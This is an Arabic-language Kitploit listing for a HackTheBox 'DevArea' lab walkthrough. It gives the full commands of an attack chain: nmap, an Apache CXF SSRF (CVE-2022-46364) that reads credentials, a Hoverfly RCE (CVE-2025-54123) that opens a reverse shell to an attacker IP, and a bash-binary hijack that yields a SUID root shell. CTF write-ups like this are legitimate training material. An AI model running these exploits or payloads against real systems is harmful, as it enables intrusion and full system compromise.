Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
devarea — HackTheBox DevArea walkthrough chaining CVE-2022-46364 Apache CXF SSRF، CVE-2025-54123 Hoverfly RCE، وSUID bash hijacking لتصعيد الصلاحيات إلى root. | Kitploit
أدوات/GitHubGitHub/ledksv/devarea
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubledksv/devarea

devarea

HackTheBox DevArea walkthrough chaining CVE-2022-46364 Apache CXF SSRF، CVE-2025-54123 Hoverfly RCE، وSUID bash hijacking لتصعيد الصلاحيات إلى root.

منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

DevArea — HackTheBox

المنصة: HackTheBox نظام التشغيل: Linux الحالة: متقاعد — تم نشر الشرح الكامل.

الشرح الكامل: l3dsec.com/walkthroughs/devarea-htb


سلسلة الهجوم

root@kitploit:~
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
  → FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
    → CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
      → admin credentials in ExecStart
        → CVE-2025-54123 Hoverfly RCE → shell as dev_ryan → user flag
          → /usr/bin/bash world-writable + sudo syswatch.sh calls it
            → bash hijack → SUID rootbash → root flag

1. الاستطلاع

root@kitploit:~
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp  open  ftp     vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http    Jetty 9.4.27
# 8888/tcp open http    Hoverfly Dashboard

تنزيل FTP anon من pub/ يُنتج employee-service.jar — خدمة Apache CXF SOAP، إصدار مُضمَّن أقدم من 3.5.5.


2. CVE-2022-46364 (Apache CXF SSRF → قراءة بيانات الاعتماد)

CXF قبل 3.5.5 يعكس عناوين URL الخاصة بـ XOP:Include من جانب الخادم — قراءة ملفات عشوائية عبر file://.

root@kitploit:~
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan

3. CVE-2025-54123 (Hoverfly Authenticated RCE)

Hoverfly 1.11.3 — تنفيذ أوامر عن بُعد مُصادَق عليه عبر حقن إعدادات middleware.

root@kitploit:~
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Shell باسم dev_ryan. علم المستخدم في /home/dev_ryan/user.txt.


4. تصعيد الصلاحيات — اختطاف ثنائي Bash

root@kitploit:~
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx  (world-writable)

syswatch.sh يستدعي /usr/bin/bash داخليًا. استبدله بسكربت يُسقط SUID:

root@kitploit:~
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)

علم الروت في /root/root.txt.


الأعلام

العلمالقيمة
Userredacted
Rootredacted

لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح باختبارها.

تنزيل الأداة